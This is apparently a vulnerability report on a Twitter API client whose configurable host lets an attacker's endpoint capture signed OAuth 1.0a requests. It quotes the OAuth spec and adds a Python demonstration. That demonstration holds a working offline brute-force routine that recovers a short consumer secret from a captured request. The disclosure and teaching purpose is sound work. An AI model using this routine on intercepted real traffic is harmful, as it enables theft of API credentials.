Disclaimer: I'm not an expert on OAuth or cryptography, so please feel free to dispute this!
I believe I've discovered a security vulnerability that could make a user's Twitter credentials vulnerable to capture. Because the Twitter API hostname is configurable via the `host` parameter, a malicious user could set up their own API endpoint to eavesdrop on Twitter API requests.

Now, the requests are cryptographically signed; however, according to section 11.10 of the OAuth 1.0A documentation:

> …eavesdroppers will have full access to OAuth requests and signatures, and will thus be able to mount offline brute-force attacks to recover the Consumer's credentials used. Service Providers should be careful to assign Token Secrets and Consumer Secrets which are long enough - and random enough - to resist such attacks for at least the length of time that the secrets are valid.

In addition, according to section 11.12:

> SHA-1, the hash algorithm used in HMAC-SHA1 signatures, has been shown to have a number of cryptographic weaknesses that significantly reduce its resistance to collision attacks. Practically speaking, these weaknesses are difficult to exploit, and by themselves do not pose a significant risk to users of OAuth. They may, however, make more efficient attacks possible, and NIST has announced that it will phase out use of SHA-1 by 2010.
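The following Python is an added example, not code from this issue or from the library being discussed. It shows concretely what the quoted section 11.10 warns about: once a client has been pointed at an attacker-controlled host, the attacker sees the full signed request and can recover a short consumer secret offline. The example builds the OAuth 1.0a signature base string and HMAC-SHA1 signature, then runs the eavesdropper's brute-force search over a captured request-token call. The hostname `api.attacker.example`, the parameter values, and both consumer secrets are constructed for the demonstration.

```python
import base64
import hashlib
import hmac
import itertools
import string
from urllib.parse import quote


def oauth_percent_encode(value: str) -> str:
    """Percent-encode per OAuth 1.0a section 5.1 (only RFC 3986 unreserved characters kept)."""
    return quote(value, safe="-._~")


def signature_base_string(method: str, url: str, params: dict) -> str:
    """Build the signature base string of OAuth 1.0a section 9.1.

    Parameters are encoded, sorted by name then value and joined with '&';
    method, URL and the normalized parameter string are each encoded again
    before being joined with '&'.
    """
    pairs = sorted((oauth_percent_encode(k), oauth_percent_encode(v)) for k, v in params.items())
    normalized = "&".join(f"{k}={v}" for k, v in pairs)
    return "&".join(oauth_percent_encode(part) for part in (method.upper(), url, normalized))


def hmac_sha1_signature(base_string: str, consumer_secret: str, token_secret: str = "") -> str:
    """HMAC-SHA1 signature of section 9.2: key = enc(consumer_secret) '&' enc(token_secret).

    On the request-token leg there is no token yet, so the token secret is the
    empty string and the signature depends on the consumer secret alone.
    """
    key = oauth_percent_encode(consumer_secret) + "&" + oauth_percent_encode(token_secret)
    digest = hmac.new(key.encode("ascii"), base_string.encode("ascii"), hashlib.sha1).digest()
    return base64.b64encode(digest).decode("ascii")


def brute_force_consumer_secret(base_string, signature, alphabet, max_len, token_secret=""):
    """Eavesdropper side (section 11.10): try every secret up to max_len characters."""
    for length in range(1, max_len + 1):
        for chars in itertools.product(alphabet, repeat=length):
            guess = "".join(chars)
            if hmac.compare_digest(hmac_sha1_signature(base_string, guess, token_secret), signature):
                return guess
    return None


# Constructed sample: a request-token call that the client sent to a host the
# attacker chose through the configurable `host` parameter (hostname is made up).
CAPTURED_URL = "https://api.attacker.example/oauth/request_token"
CAPTURED_PARAMS = {
    "oauth_consumer_key": "dpf43f3p2l4k3l03",
    "oauth_signature_method": "HMAC-SHA1",
    "oauth_timestamp": "1191242090",
    "oauth_nonce": "hsu94j3884jdopsl",
    "oauth_version": "1.0",
    "oauth_callback": "http://client.example/callback",
}

WEAK_CONSUMER_SECRET = "abc"  # deliberately short: three lowercase letters (constructed)
STRONG_CONSUMER_SECRET = "Q9vQ2c1mX7wR4tKpL0sZ8yUeB3nH6aJd"  # 32 mixed characters (constructed)


def demo(alphabet=string.ascii_lowercase, max_len=3):
    """Sign the captured request with both secrets, then run the attacker's search on each."""
    base = signature_base_string("POST", CAPTURED_URL, CAPTURED_PARAMS)
    weak_sig = hmac_sha1_signature(base, WEAK_CONSUMER_SECRET)
    strong_sig = hmac_sha1_signature(base, STRONG_CONSUMER_SECRET)
    recovered_weak = brute_force_consumer_secret(base, weak_sig, alphabet, max_len)
    recovered_strong = brute_force_consumer_secret(base, strong_sig, alphabet, max_len)
    return recovered_weak, recovered_strong


if __name__ == "__main__":
    weak, strong = demo()
    print("weak secret recovered:", weak)      # abc
    print("strong secret recovered:", strong)  # None
```

The search space here is tiny (26^3 candidates) so the run finishes in well under a second; against a real secret the attacker would use a wordlist or a GPU, and the only thing stopping them is the length and randomness of the secret, which is exactly the point of section 11.10. The request-token leg is the worst case for the client because the signing key is the consumer secret followed by `&` and nothing else.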